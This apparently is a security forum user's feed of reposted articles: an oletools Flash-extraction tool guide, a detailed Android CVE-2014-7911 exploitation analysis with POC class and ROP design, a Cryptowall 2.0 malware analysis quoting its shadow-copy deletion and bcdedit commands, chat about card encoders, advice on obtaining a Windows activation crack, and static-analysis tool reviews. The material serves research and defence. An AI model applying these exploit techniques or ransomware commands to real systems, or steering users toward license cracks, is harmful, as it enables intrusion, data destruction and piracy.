Everything posted by Nytro

  1. Nytro

     pyxswf

     pyxswf is a script to detect, extract and analyze Flash objects (SWF files) that may be embedded in files such as MS Office documents (e.g. Word, Excel), which is especially useful for malware analysis. It is part of the python-oletools package.

     pyxswf is an extension to xxxswf.py, published by Alexander Hanel. Compared to xxxswf, it can extract streams from MS Office documents by parsing their OLE structure properly, which is necessary when streams are fragmented. Stream fragmentation is a known obfuscation technique, as explained on Ixia. It can also extract Flash objects from RTF documents, by parsing embedded objects encoded in hexadecimal format (-f option). Simply add the -o option to work on OLE streams rather than raw files, or the -f option to work on RTF files.

     Usage:

     ```
     Usage: pyxswf.py [options] <file.bad>

     Options:
       -o, --ole             Parse an OLE file (e.g. Word, Excel) to look for SWF
                             in each stream
       -f, --rtf             Parse an RTF file to look for SWF in each embedded
                             object
       -x, --extract         Extracts the embedded SWF(s), names it MD5HASH.swf &
                             saves it in the working dir. No additional args needed
       -h, --help            Show this help message and exit
       -y, --yara            Scans the SWF(s) with yara. If the SWF(s) is
                             compressed it will be deflated. No additional args
                             needed
       -s, --md5scan         Scans the SWF(s) for MD5 signatures. Please see func
                             checkMD5 to define hashes. No additional args needed
       -H, --header          Displays the SWF file header. No additional args
                             needed
       -d, --decompress      Deflates compressed SWF(s)
       -r PATH, --recdir=PATH
                             Will recursively scan a directory for files that
                             contain SWFs. Must provide path in quotes
       -c, --compress        Compresses the SWF using Zlib
     ```

     Example 1 - detecting and extracting a SWF file from a Word document on Windows:

     ```
     C:\oletools>pyxswf.py -o word_flash.doc
     OLE stream: 'Contents'
     [SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
     [ADDR] SWF 1 at 0x8 - FWS Header

     C:\oletools>pyxswf.py -xo word_flash.doc
     OLE stream: 'Contents'
     [SUMMARY] 1 SWF(s) in MD5:993664cc86f60d52d671b6610813cfd1:Contents
     [ADDR] SWF 1 at 0x8 - FWS Header
     [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
     ```

     Example 2 - detecting and extracting a SWF file from an RTF document on Windows:

     ```
     C:\oletools>pyxswf.py -xf "rtf_flash.rtf"
     RTF embedded object size 1498557 at index 000036DD
     [SUMMARY] 1 SWF(s) in MD5:46a110548007e04f4043785ac4184558:RTF_embedded_object_000036DD
     [ADDR] SWF 1 at 0xc40 - FWS Header
     [FILE] Carved SWF MD5: 2498e9c0701dc0e461ab4358f9102bc5.swf
     ```

     How to use pyxswf in Python applications: TODO

     Source: https://bitbucket.org/decalage/oletools/wiki/pyxswf
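The detection step that pyxswf and xxxswf perform boils down to scanning a buffer for SWF signatures. As a rough illustrative sketch (this is not oletools code; it relies only on the public SWF header layout: a 3-byte signature 'FWS'/'CWS'/'ZWS', a version byte, then a 4-byte little-endian file length):

```python
import struct

# Illustrative sketch (not part of oletools): locate candidate SWF headers
# in a raw byte buffer the way xxxswf-style carvers do. An SWF starts with
# 'FWS' (uncompressed), 'CWS' (zlib) or 'ZWS' (LZMA), followed by a version
# byte and a 4-byte little-endian file length.
SWF_MAGICS = (b"FWS", b"CWS", b"ZWS")

def find_swf_headers(data):
    """Return (offset, magic, version, length) for each candidate SWF header."""
    hits = []
    for magic in SWF_MAGICS:
        start = 0
        while True:
            idx = data.find(magic, start)
            if idx == -1:
                break
            if idx + 8 <= len(data):
                version = data[idx + 3]
                (length,) = struct.unpack_from("<I", data, idx + 4)
                hits.append((idx, magic.decode(), version, length))
            start = idx + 1
    return sorted(hits)
```

On a carved OLE stream this reports each candidate header offset; pyxswf layers proper OLE/RTF parsing and carving on top of a scan like this.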
  2. CVE-2014-7911 – A Deep Dive Analysis of Android System Service Vulnerability and Exploitation

     Posted by Yaron Lavi and Nadav Markus on January 6, 2015, 6:00 AM

     In this post we discuss CVE-2014-7911 and the various techniques that can be used to achieve privilege escalation. We also examine how some of these techniques can be blocked using several security mechanisms.

     The Vulnerability

     CVE-2014-7911 was presented here along with a very descriptive POC written by Jann Horn. Described briefly, ObjectInputStream does not validate that the class type named in a serialized object is actually serializable; it creates an instance of that class anyway, populated with the deserialized values. An attacker can therefore instantiate an object of any class and control its private fields by serializing an object of another class that gets deserialized as if it were the target class. Let's look at the example below.

     The following snippet (copied from the original POC) shows a spoofed BinderProxy class:

     ```java
     package AAdroid.os;

     import java.io.Serializable;

     public class BinderProxy implements Serializable {
         private static final long serialVersionUID = 0;
         public long mObject = 0x1337beef;
         public long mOrgue = 0x1337beef;
     }
     ```

     In the POC code above, the attacker serializes a class named AAdroid.os.BinderProxy and changes its name to android.os.BinderProxy after marshalling it, before sending it to the system server. The android.os.BinderProxy class is not serializable, and it involves native code that handles mObject and mOrgue as pointers. If it were serializable, the raw pointer values would not be deserialized; the objects they reference would be.
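The renaming trick works because the spoofed class name has exactly the same length as the real one, so patching the bytes does not disturb any offsets in the rest of the stream. A hedged sketch of that patching step (Python stands in here for the POC's Java marshalling code; a real Java serialization stream is more involved than this flat substitution suggests):

```python
# Sketch of the renaming trick used by the POC: serialize a class whose name
# has the same length as the target ("AAdroid.os.BinderProxy" vs.
# "android.os.BinderProxy"), then patch the class name inside the serialized
# byte stream before sending it to the system server.
SPOOF = b"AAdroid.os.BinderProxy"
TARGET = b"android.os.BinderProxy"

def rename_serialized_class(blob):
    """Rewrite the spoofed class name to the target inside a serialized blob."""
    # Equal lengths keep every other offset in the stream valid.
    assert len(SPOOF) == len(TARGET)
    return blob.replace(SPOOF, TARGET)
```

Because the lengths match, the patched blob is byte-for-byte the same size, which is what lets the deserializer accept it while instantiating the wrong class.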
     The deserialization code in ObjectInputStream deserializes the sent object as an android.os.BinderProxy instance, leading to type confusion. As mentioned earlier, this type confusion results in the native code reading pointer values from the attacker's spoofed android.os.BinderProxy: supposedly private fields which the attacker has modified. Specifically, the field of interest is mOrgue. android.os.BinderProxy contains a finalize method that results in native code invocation, and that native code uses mOrgue as a pointer. This is the finalize method (tidied up from the decompiler output):

     ```java
     protected void finalize() throws Throwable {
         try {
             destroy();
         } finally {
             super.finalize();
         }
     }
     ```

     And this is the declaration of destroy:

     ```java
     private final native void destroy();
     ```

     The native destroy function:

     ```cpp
     static void android_os_BinderProxy_destroy(JNIEnv* env, jobject obj)
     {
         IBinder* b = (IBinder*) env->GetIntField(obj, gBinderProxyOffsets.mObject);
         DeathRecipientList* drl = (DeathRecipientList*)
                 env->GetIntField(obj, gBinderProxyOffsets.mOrgue);

         LOGDEATH("Destroying BinderProxy %p: binder=%p drl=%p\n", obj, b, drl);
         env->SetIntField(obj, gBinderProxyOffsets.mObject, 0);
         env->SetIntField(obj, gBinderProxyOffsets.mOrgue, 0);
         drl->decStrong((void*)javaObjectForIBinder);
         b->decStrong((void*)javaObjectForIBinder);
         IPCThreadState::self()->flushCommands();
     }
     ```

     Eventually, the native code invokes decStrong (in drl->decStrong((void*)javaObjectForIBinder)). Note that at this point drl is controlled by the attacker, as evident from the line:

     ```cpp
     DeathRecipientList* drl = (DeathRecipientList*)
             env->GetIntField(obj, gBinderProxyOffsets.mOrgue);
     ```

     So decStrong is going to be called with the attacker controlling the 'this' pointer. Let's take a look at the decStrong code from the RefBase class source:

     ```cpp
     void RefBase::decStrong(const void* id) const
     {
         weakref_impl* const refs = mRefs;
         refs->removeStrongRef(id);
         const int32_t c = android_atomic_dec(&refs->mStrong);
     #if PRINT_REFS
         ALOGD("decStrong of %p from %p: cnt=%d\n", this, id, c);
     #endif
         ALOG_ASSERT(c >= 1, "decStrong() called on %p too many times", refs);
         if (c == 1) {
             refs->mBase->onLastStrongRef(id);
             if ((refs->mFlags & OBJECT_LIFETIME_MASK) == OBJECT_LIFETIME_STRONG) {
                 delete this;
             }
         }
         refs->decWeak(id);
     }
     ```

     Note the line refs->mBase->onLastStrongRef(id); it will eventually lead to arbitrary code execution. In the following screenshot of the RefBase::decStrong assembly, the attacker controls r0 (the 'this' pointer).

     Exploitation

     The first use of the controlled register r0, which contains the 'this' pointer (drl), is in these lines:

     ```cpp
     weakref_impl* const refs = mRefs;
     refs->removeStrongRef(id);
     const int32_t c = android_atomic_dec(&refs->mStrong);
     ```

     These are translated to the following assembly:

     ```
     ldr r4, [r0, #4]    @ attacker controls r4
     mov r6, r1
     mov r0, r4
     blx <android_atomic_dec>
     ```

     First, r4 is loaded with the mRefs variable:
     ```
     ldr r4, [r0, #4]    @ attacker controls r4
     ```

     Note that r0 is the 'this' pointer of drl, and mRefs is the first private variable following the virtual function table, hence it sits 4 bytes after the 'this' pointer. Then android_atomic_dec is called with &refs->mStrong:

     ```cpp
     const int32_t c = android_atomic_dec(&refs->mStrong);
     ```

     This is translated to:

     ```
     mov r0, r4
     blx <android_atomic_dec>
     ```

     r0 now contains &refs->mStrong. Note that mStrong is the first data member of refs (of class weakref_impl), and that this class contains no virtual functions, hence no vtable, so mStrong is at offset 0 of r4.
     The line refs->removeStrongRef(id); is not present in the assembly simply because the compiler optimized it away: it has an empty implementation, as the following code shows:

     ```cpp
     void removeStrongRef(const void* /*id*/) { }
     ```

     Following the call to android_atomic_dec are these lines of code:

     ```cpp
     if (c == 1) {
         refs->mBase->onLastStrongRef(id);
     ```

     These are translated to the following assembly:

     ```
     cmp r0, #1
     bne.n d1ea
     ldr r0, [r4, #8]
     mov r1, r6
     ldr r3, [r0, #0]
     ldr r2, [r3, #12]
     blx r2
     ```

     Note that android_atomic_dec returns the value of the specified memory address before the decrement took place. So in order to reach refs->mBase->onLastStrongRef(id) (the blx r2), refs->mStrong must hold the value 1.

     To sum up, an attacker must satisfy several constraints to gain code execution:

     • drl (the first controlled pointer, i.e. r0 when entering decStrong) must point to a readable memory location.
     • refs->mStrong must have the value 1.
     • The dereference chain at refs->mBase->onLastStrongRef(id) must succeed and eventually point to an executable address.

     In addition, an attacker must overcome the usual obstacles of exploitation: ASLR and DEP. Basic techniques, including heap spraying, stack pivoting and ROP, can fulfill these requirements and bypass these mitigations. Let's look at them in detail.

     Heap spray

     An attacker's first step is to get a reliable readable address containing arbitrary data, most commonly achieved via a heap spray.
     The system server provides several core functionalities for the Android device, many of which are exposed to applications via various service interfaces. A common way to invoke a service in the context of the system server looks like this:

     ```java
     LocationManager lm = (LocationManager) getSystemService(LOCATION_SERVICE);
     ```

     The acquired manager lets us invoke functionality in the system server on our behalf, via IPC. Several services could be used for a heap spray, but for the purpose of this blog we chose one that requires special app permissions, to prevent normal applications from utilizing the technique. The location manager allows us to register test providers via the function addTestProvider, letting us pass an arbitrary name that contains arbitrary data. As mentioned, one must enable developer options and the mock locations option to use this.

     ```java
     lm.addTestProvider(builder.toString(), false, false, false, false, false,
                        false, false, 1, 1);
     ```

     Note that this heap spray has a limitation: the data is sprayed through the name field, which is Unicode, so we are limited to byte sequences that correspond to valid Unicode code points.

     Spray addresses manipulation

     After spraying the system server's address space we encountered another issue: our chosen static address indeed pointed to readable data on each run, but not to the exact same offset within a spray chunk each time. We solved this by crafting a special spray that contains decreasing pointer values.
     Here is an illustration of the sprayed buffer, followed by an explanation of its structure. STATIC_ADDRESS is the arbitrarily chosen static pointer placed in mOrgue. GADGET_BUFFER_OFFSET is the offset of GADGET_BUFFER from the beginning of the spray. On each run of the system server process, the static address we chose points into our controlled data, but at a different offset: r0 (which always holds the same chosen STATIC_ADDRESS) can land on any dword-aligned offset in the "relative address chunk", and therefore reads one of the STATIC_ADDRESS + GADGET_BUFFER_OFFSET - 4N values.

     Note the following equation:

     GADGET_BUFFER = Beginning_of_spray + GADGET_BUFFER_OFFSET

     If r0 (= STATIC_ADDRESS) points to the beginning of the spray, then STATIC_ADDRESS = Beginning_of_spray, hence:

     GADGET_BUFFER = STATIC_ADDRESS + GADGET_BUFFER_OFFSET

     In any other case, r0 (= STATIC_ADDRESS) points to some dword-aligned offset inside the spray: STATIC_ADDRESS = Beginning_of_spray + 4N, i.e. Beginning_of_spray = STATIC_ADDRESS - 4N, hence:

     GADGET_BUFFER = STATIC_ADDRESS + GADGET_BUFFER_OFFSET - 4N

     The higher the offset in the chunk that r0 (= STATIC_ADDRESS) lands on, the more we must subtract for the expression STATIC_ADDRESS + GADGET_BUFFER_OFFSET - 4N to point at GADGET_BUFFER. So no matter which offset in the chunk r0 points to, dereferencing it yields the current address of GADGET_BUFFER. (And what if we dereference the other addresses in the chunk? The farther above r0 we read, the farther below GADGET_BUFFER the dereference lands.)

     Now that we have a valid working spray, let's go back to analyzing the assembly.
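As a sanity check, the offset arithmetic just described can be modeled in a few lines of Python (an illustrative toy model only; the chunk size and GADGET_BUFFER_OFFSET below are made-up values, not the exploit's):

```python
# Toy model of the spray described above: the "relative address chunk" is
# filled with decreasing pointer values, so that wherever STATIC_ADDRESS
# lands inside the chunk, dereferencing it yields the current address of
# GADGET_BUFFER. Constants are illustrative, not taken from the exploit.
GADGET_BUFFER_OFFSET = 0x1000  # offset of GADGET_BUFFER within the spray

def build_chunk(static_address, n_slots):
    """Slot i of the chunk holds STATIC_ADDRESS + GADGET_BUFFER_OFFSET - 4*i.

    The attacker knows i (the offset within their own buffer) and the fixed
    STATIC_ADDRESS when building the spray, but not where the spray will land.
    """
    return [static_address + GADGET_BUFFER_OFFSET - 4 * i for i in range(n_slots)]

def deref(chunk, spray_base, static_address):
    """Simulate reading the dword at STATIC_ADDRESS, given where the spray
    actually started on this run (spray_base = STATIC_ADDRESS - 4N)."""
    slot = (static_address - spray_base) // 4
    return chunk[slot]
```

Whatever value N takes on a given run, deref() returns spray_base + GADGET_BUFFER_OFFSET, i.e. the run's actual GADGET_BUFFER address, which is exactly the property the exploit relies on.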
     ```
     ldr r4, [r0, #4]
     mov r0, r4
     blx <android_atomic_dec>
     cmp r0, #1
     ```

     To satisfy the second constraint, refs->mStrong must contain 1:

     ```
     ldr r4, [r0, #4]    @ r4 = [STATIC_ADDRESS + 4]  ->  r4 = GADGET_BUFFER - 4
     ```

     [r4] should contain 1, hence [GADGET_BUFFER - 4] must contain 1. Once atomic_dec's return value is indeed 1, we must survive the remaining dereferences to reach the blx opcode:

     ```
     cmp r0, #1
     bne.n d1ea
                         @ r4 = GADGET_BUFFER - 4
     ldr r0, [r4, #8]    @ r0 = [GADGET_BUFFER - 4 + 8] = [GADGET_BUFFER + 4]
     mov r1, r6
     ldr r3, [r0, #0]    @ r3 = [[GADGET_BUFFER + 4]]
     ```

     For this dereference to succeed, [GADGET_BUFFER + 4] must contain a KNOWN valid address. We arbitrarily chose the known address STATIC_ADDRESS.

     ```
     ldr r2, [r3, #12]   @ r2 = [GADGET_BUFFER + 12]
     blx r2
     ```

     So now we can build GADGET_BUFFER accordingly.

     ROP CHAIN

     We chose to run the "system" function with a predefined command line. To make r0 point to the command line string, we need gadgets that manipulate the registers. We get only one function call, so to take control of the execution flow with our gadgets, we need a stack pivot gadget. The first function pointer therefore prepares for the stack pivot, where r5 equals the original r0 (STATIC_ADDRESS), as one can see at the beginning of decStrong.
     ```
     mov r0, r5          @ restore r0 to its original value
     ldr r7, [r5]        @ r7 = [STATIC_ADDRESS]  ->  r7 = GADGET_BUFFER
     ldr r2, [r7, #0x54] @ r2 = [GADGET_BUFFER + 0x54]
     blx r2
     ```

     This calls the next gadget, which must sit 21 (= 0x54 / 4) dwords from the beginning of GADGET_BUFFER. That gadget performs the stack pivot: SP is made to point at r7, so the stack is now under our control and points into GADGET_BUFFER. It returns into the next gadget, which must be kept 8 dwords from the beginning of GADGET_BUFFER (note the pop {r4-r11,pc} instruction, which pops 8 registers off the stack before popping pc).

     ```
     r0 = [r0 + 0x38]    @ r0 = GADGET_BUFFER - 0x38 (per the spray layout explained above)
     ```

     Now r0 points 56 (0x38) bytes before GADGET_BUFFER, giving us 52 command line characters, excluding the "1" needed for atomic_dec. We then return into the next gadget, kept 10 dwords from the beginning of GADGET_BUFFER (2 dwords after the current gadget's pop {r3,pc}). That last gadget is where we call system! Here is an updated layout of the memory for this to happen.

     Android and ARM

     There are two important issues to keep in mind when choosing gadget addresses. Android has an ASLR mechanism, so addresses are not the same on every run. To learn the correct addresses, we use the fact that both the system server process and our app are forked from the same process, zygote, meaning we share the same modules. So we obtain the addresses of the necessary modules in the system server process by parsing the maps file of our own process: /proc/<pid>/maps contains the memory layout and the loaded modules' addresses.
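The zygote trick can be sketched in a few lines (Python for brevity; the real exploit does this inside the app, but the /proc/&lt;pid&gt;/maps line format is the same). The sample mapping addresses used below are invented for illustration:

```python
# Sketch of the zygote trick: because the app and system_server are forked
# from the same zygote, shared libraries load at the same base address in
# both, so parsing our own /proc/self/maps reveals the module bases inside
# system_server as well. Field layout follows the standard maps format:
#   address-range  perms  offset  dev  inode  pathname
def module_base(maps_text, module):
    """Return the lowest mapped base address of `module`, or None."""
    best = None
    for line in maps_text.splitlines():
        parts = line.split()
        if len(parts) >= 6 and parts[5].endswith(module):
            start = int(parts[0].split("-")[0], 16)
            if best is None or start < best:
                best = start
    return best
```

In the real attack this base is then added to the gadgets' known offsets within each library to produce absolute gadget addresses despite ASLR.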
     An ARM CPU has two instruction-decoding modes: ARM (4 bytes per opcode) and THUMB (variable, 2 or 4 bytes per opcode). The same address in PC can therefore be decoded differently depending on the current mode. Some of the gadgets we use are THUMB code. To make the processor switch modes when branching to those gadgets, we change the pointer from the actual address to (address | 1): with the LSB set, the CPU jumps to the correct address in THUMB mode.

     PAYLOAD

     As described before, we use the "system" function to run our command line. The length of the command line is limited, and a command line cannot serve every purpose, so we use a precompiled ELF, written to the file system as an asset of our app. This ELF can do anything with uid 1000 (the uid of the system server). The command line we pass to system is simply "sh -c " + file_path.

     CONCLUSION

     Android has common security mechanisms such as ASLR and DEP which should make exploitation of a vulnerability harder to achieve. Moreover, every application runs in its own process, so IPC communication can be validated, and guessing the memory layout should not be straightforward. On the other hand, the fact that every process is forked from the same process makes ASLR irrelevant for vulnerabilities reachable within zygote's children, and the binder connection from every process to the system server can enable a heap spray, as seen in this post. These issues appear to be inherent in the Android OS design. Palo Alto Networks has been researching an Android security solution that, based on our lab testing, would have blocked this exploit (as well as other exploits) with multiple exploit mitigation modules. We hope to share more details in the coming months.

     Source: CVE-2014-7911 – A Deep Dive Analysis of Android System Service Vulnerability and Exploitation - Palo Alto Networks Blog
  3. Ransomware on Steroids: Cryptowall 2.0

     Talos Group | January 6, 2015 at 7:14 am PST

     This post was authored by Andrea Allievi and Earl Carter.

     Ransomware holds a user's data hostage. The latest ransomware variants encrypt the user's data, making it unusable until a ransom is paid to retrieve the decryption key. The latest Cryptowall, 2.0, utilizes TOR to obfuscate the command and control channel. The dropper utilizes multiple exploits to gain initial access and incorporates anti-VM and anti-emulation checks to hamper identification via sandboxes. The dropper and the downloaded Cryptowall binary both incorporate multiple levels of encryption. One of the most interesting aspects of this malware sample, however, is its capability to run 64-bit code directly from its 32-bit dropper: under the Windows 32-bit on Windows 64-bit (WOW64) environment, it is able to switch the processor execution context from 32 bit to 64 bit.

     Initial Compromise

     Cryptowall 2.0 can be delivered through multiple attack vectors, including email attachments, malicious PDF files and even various exploit kits. In the sample we analyzed, the dropper exploited CVE-2013-3660, "Win32k.sys Elevation of Privilege Vulnerability", to achieve the initial privilege escalation on x86 machines. This exploit works on 32-bit OSs beginning with Vista. The dropper even includes a 64-bit DLL able to trigger the exploit on all vulnerable AMD64 Windows systems. Provided the anti-VM and anti-emulation checks pass, the Cryptowall malware is decrypted and installed on the system. Once the system is infected, the user is presented a message similar to Figure 1.

     Figure 1.

     Constructing the Unencrypted Cryptowall Binary

     To construct the unencrypted Cryptowall 2.0 code, the dropper goes through multiple stages of decryption. The main dropper is a C++ MFC application. The first-stage decryption code is located at "CMainFrame::OnCreate" in the MFC event handler.
     The handler builds the first-stage decryption code (at RVA +0xF3F0) and simply calls it. The first-stage decryption code opens the original dropper PE, reads from it, and decrypts a big chunk of code (the second stage). Finally it transfers execution to the second stage, located in the external buffer. The second stage is the last encryption-layer code. It builds a simple Import Address Table (IAT) and implements multiple features, the most important being the anti-VM check. The anti-VM code is quite simple:

     Figure 2: The CryptoWall simple Anti-VM check code.

     If no VM is detected, another "dropper" process is spawned in a suspended state. The "ZwUnmapViewOfSection" API is used to unmap the original PE buffer. A new memory chunk is allocated and a new PE (extracted and decrypted from the ".data" section) is copied to its preferred base address. Then the new process's thread is resumed with the following context, and the original process terminates:

     • the EAX register is set to the new PE entry point address;
     • the EBX register is set to a still-unknown value: 7ffd8008.

     Installing Cryptowall on the System

     The "VirusExplorerMain" routine in the faked "explorer" process constructs the IAT and installs CryptoWall on the victim system. The first step is to create an executable whose name is based on the computer's MD5 hash. This executable is copied to the location specified by the "%APPDATA%" environment variable ("C:\Users\<Username>\AppData\Roaming"). To maintain persistence, an auto-start registry value is added in:

     HKCU\Software\Microsoft\Windows\CurrentVersion\Run
     HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce

     Note: the RunOnce value is preceded by a "*" so that the process starts even in Safe Mode. The same random executable is copied to the "Startup" folder of the Start Menu. The last duty of the faked "explorer" process is to disable all system protections.
     The following shell commands are executed:

     ```
     vssadmin.exe Delete Shadows /All /Quiet
     bcdedit.exe /set {default} recoveryenabled No
     bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
     ```

     The following services are also disabled: Security Center, Windows Defender, Windows Update, Background Intelligent Transfer Service, ERSvc, Windows Error Reporting Service. Finally, the original dropper process is terminated and its file is deleted.

     The Cryptowall PE is now injected into a faked "svchost" process in the same way the fake "explorer" process was created initially, and the infection continues there. The "VirusSvchostMain" function (RVA 0x418C70) is the main infection routine. It constructs the virus IAT (importing functions from the following modules: ntdll, kernel32, advapi32, user32, wininet, ole32, gdi32), checks whether the installation is done, and creates the main Cryptowall event. It then creates the main Cryptowall thread and tries to download the TOR client used for communication from one of several URLs. If it succeeds in downloading the update file, it executes it directly. The downloaded binary is an executable that is encrypted 3 times with a simple algorithm. After decryption, a clean PE file is extracted and launched. This PE file is peculiar because it has all its normal headers (DOS header, NT header, IAT, EAT, ...) stripped; its IAT and ".data" section reside in another big memory buffer, and the decryption code deals with the correct linking and relocation. This clean PE is the Cryptowall TOR communication module: it implements a complete TOR client used for Command & Control communication. The TOR URLs used by the sample we analyzed were:

     crptarv4hcu24ijv.onion
     crptbfoi5i54ubez.onion
     crptcj7wd4oaafdl.onion

     Using hardcoded IP addresses in the PE, the malware connects to the TOR server with an encrypted SSL connection on port 443 or 9090.
     After successfully connecting, it starts to generate Cryptowall domain names using a customized Domain Generation Algorithm (DGA). The algorithm is located at offset +0x2E9FC.

     Figure 3: The code of the DGA algorithm in the TOR client

     If the encrypted connection goes well, communication with the Cryptowall Command & Control server takes place; otherwise the main thread sleeps for a random number of seconds and then retries with a newly generated server name. Each of the many SSL connections Cryptowall 2.0 establishes uses random server names in the certificates. However, the client certificates share commonalities that are unique enough to make it possible to detect these client connections outbound.

     Cryptowall 2.0 makes many, many requests once installed. Initially it attempts to identify the outside address of the network the system is operating on, using its "GetExternalIpAddr" function. It accomplishes this by communicating with one of the following addresses:

     http://wtfismyip.com/text
     http://ip-addr.es
     http://myexternalip.com/raw
     http://curlmyip.com

     It starts with wtfismyip.com and stops after the first successful reply. In most situations this means it will only ever contact wtfismyip.com (since it is the first entry in the list). Although this is a fairly generic request, it should not be a common occurrence in an enterprise network and can serve as a potential network indicator of this malware.

     Another interesting aspect of the sample we analyzed is that it includes some 64-bit code (and an exploit DLL) directly in its main 32-bit executable. Although the main module runs in 32-bit mode, it is capable of executing all the 64-bit functions it needs by performing a direct processor execution-context switch. The code pushes two 32-bit values on the stack: the low half of the target 64-bit function's address, and the selector of the 64-bit code segment.
     ```
     push <32Bit Selector>
     push <32Bit Low DWORD address>
     retf
     ```

     It finally performs a FAR RET (opcode 0xCB). As the Intel manuals say, this opcode executes a "far return": a return to a calling procedure located in a different segment than the current code segment. The target code segment is a 64-bit one, so the processor switches its execution context. To return to 32-bit mode, the code reverses the process:

     ```
     call $+5                                 ; pushes the 64-bit return address on the stack
     mov dword ptr [esp+4], <32Bit Selector>  ; the same as PUSH <32bit value>, keeping in mind
     mov dword ptr [esp], <32Bit Address>     ; that stack slots are 8 bytes wide in AMD64 mode
     retf
     ```

     This mixing of 64-bit code with the 32-bit main executable is difficult even for IDA to disassemble. Figure 4 shows a dump of a Windows 7/8 64-bit Global Descriptor Table (GDT):

     Figure 4: A dump of the Global Descriptor Table of a 64-bit System

     As the reader can see, descriptor 0x20 and descriptor 0x30 are the ring-3 code segments that describe the entire user-mode address space, one for 32 bit and one for 64 bit. Cryptowall uses the selectors for these two segment descriptors and switches between the two execution modes during its operation. We were able to reverse this process and reconstruct the assembly code (shown in Figure 5) that performs the switch between 32 and 64 bit by pushing the correct value before executing the far return instruction.

     Figure 5: Switching Between 32 & 64 bit Modes.

     Summary

     Ransomware is a growing threat to computer users. Variants continue to evolve in functionality and evasive capability. Just getting these complex samples to run in a sandbox can be challenging, making analysis more complicated and involved. Constant research is necessary to develop updated signatures and rules to combat these constant attacks. Identifying and stopping these new complex variants requires a layered security approach.
     Breaking any step in the attack chain will successfully prevent this attack. Therefore, blocking the initial phishing emails, blocking network connections to known malicious content, and stopping malicious process activity are all critical to combating ransomware and preventing it from holding your data hostage.

     Protecting Users Against These Threats

     Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors. CWS or WSA web scanning prevents access to malicious websites, including the downloading of the malware used in these attacks. The network security protections of IPS and NGFW have up-to-date signatures to detect malicious network activity by threat actors. ESA can block the phishing emails sent by threat actors as part of this attack.

     Source: Ransomware on Steroids: Cryptowall 2.0
  4. It's perfect, exactly what you needed. How much did you pay for it? More than 200?
  5. Upload the software somewhere and give us a link. I'll take a quick look at it, but I'm not promising anything. Didn't you find anything interesting here: https://www.google.ro/search?q=c%2B%2B+magnetic+stripe+reader+usb&ie=utf-8&oe=utf-8&gws_rd=cr ?
  6. Doesn't that MSR reader come with some application? Writing one will be hard if there's no documentation. If it connects over USB, look for a USB sniffer; if it's on a serial port, a serial sniffer (those should exist). Watch which packets are sent and received and maybe you can work out how it operates, at least partially.

     Edit: I found this: http://www.cardcolor.ro/cititoare/encoder-magnetic-msr-606

     1x MSR606 magnetic encoder
     1x CD (user manual, USB driver, encoding software)
     1x A/C adapter (100-240V, with plug for worldwide use: US, AU, UK or Europe)
     1x cleaning card

     Most likely that software is for Windows and isn't open source. I see it needs a driver; I hope that doesn't cause you problems. You could try reverse engineering it at a minimal level, I don't know... If you're lucky and it's written in .NET and not obfuscated, you're set. In any case, the language you write your program in is irrelevant; it can be anything. And while we're at it, what exactly do you want to do with it?
  7. Do NOT download from sites like download.windows7loadernew.com, download.windowsloaderdaz.com or dazloader.com! At home I used: Zippyshare.com - Windows Loader v2 2 2 by Daz.zip Virustotal: https://www.virustotal.com/en/file/2f2aba1e074f5f4baa08b524875461889f8f04d4ffc43972ac212e286022ab94/analysis/1420535361/ (detected as HackTool, Crack, Keygen) I still recommend the SOURCE, as spider mentioned: Windows Loader - Support and chat - Page 1886 Note: Install the loader before installing an antivirus, although you do so at your own risk; scan it on VirusTotal first. If you install the antivirus first, you can end up with a corrupted MBR (master boot record) and be unable to boot.
  8. Be careful where you download Windows 7 Loader from; I even found a version bundled with adware...
  9. This tool, developed in 2010 by Justin Collins (@presidentbeef), is specifically for finding vulnerabilities and security issues in Ruby on Rails apps at any development stage. Brakeman is used by the likes of Twitter (where Justin is employed), GitHub, and Groupon to look for vulnerabilities. Justin gave a talk at RailsConf 2012, worth watching, describing the value of using SCA early on and how Brakeman accomplishes that.

The Good:
- Easy setup and configuration, and fast scans.
- Because it's specifically built for Ruby on Rails apps, it does a great job at checking configuration settings for best practices.
- With the ability to check only certain subsets, each code analysis can be customized to specific issues.
- The developer has been maintaining and updating the tool on a regular basis since its first release.

The Not-So-Good:
- Because the tool deliberately errs on the side of suspicion, it can show a high rate of false positives.
- As written on the tool's FAQ page, just because a report shows zero warnings doesn't mean your application is flaw-free: "There may be vulnerabilities Brakeman does not test for or did not discover. No security tool has 100% coverage."

Sursa: Brakeman - Rails Security Scanner
  10. This tool, available under a GNU General Public License, was developed to check for non-standard code that compilers would normally not detect. Created by Daniel Marjamäki, CPPCheck offers a command line mode as well as a GUI mode and has a number of possibilities for environment integration.

The Good:
- Plugins and integrations for a number of IDEs: Eclipse, Hudson, Jenkins, Visual Studio.
- Daniel's plan is to release a new version every other month or so, and he's been keeping up with that goal.
- Available in many world languages, including English, Dutch, Finnish, Swedish, German, Russian, Serbian and Japanese.

The Not-As-Good:
- Doesn't detect a large number of bugs (as with most of the other tools).
- Customization requires a good deal of effort.
- Scans take longer than with other tools.

Sursa: cppcheck | SourceForge.net
  11. Designed to be simple and easy to use, FlawFinder reports well-known security issues in applications written in C, sorted by risk level. Developed by open-source and secure software expert David Wheeler, the tool itself is written in Python and uses a command line interface. FlawFinder is officially CWE compatible.

The Good:
- Ability to check only the changes made to code, for faster, more accurate results.
- Long history: released in 2001, with consistent updates.

The Not-As-Good:
- A number of false positives.
- Requires Python 1.5.

Sursa: Flawfinder Home Page
  12. Created by ethical hacker Ryan Dewhurst (@ethicalhack3r) for his undergraduate thesis, DevBug is a very simple online PHP static code analysis tool. Written in JavaScript, it was designed to make SCA easy and pulls inspiration (as well as Taint Analysis data) from RIPS.

The Good:
- Easy to use, with instant results.
- Nice use of OWASP wiki page links for more info on any found vulnerability.

The Not-As-Good:
- Simplistic, and only meant for light analysis.

Sursa: http://www.devbug.co.uk/
  13. The tool, whose name stands for Lightweight Analysis for Program Security in Eclipse, is an OWASP security scanner, developed as an Eclipse plugin, which detects vulnerabilities in Java EE applications. LAPSE+ is licensed under the GNU General Public License v.3 and was originally developed by Stanford University.

The Good:
- Tests validation logic without compiling your code.
- Offers results in three steps: Vulnerability Source, Vulnerability Sink and Provenance Tracker.

The Not-As-Good:
- Doesn't identify compilation errors.
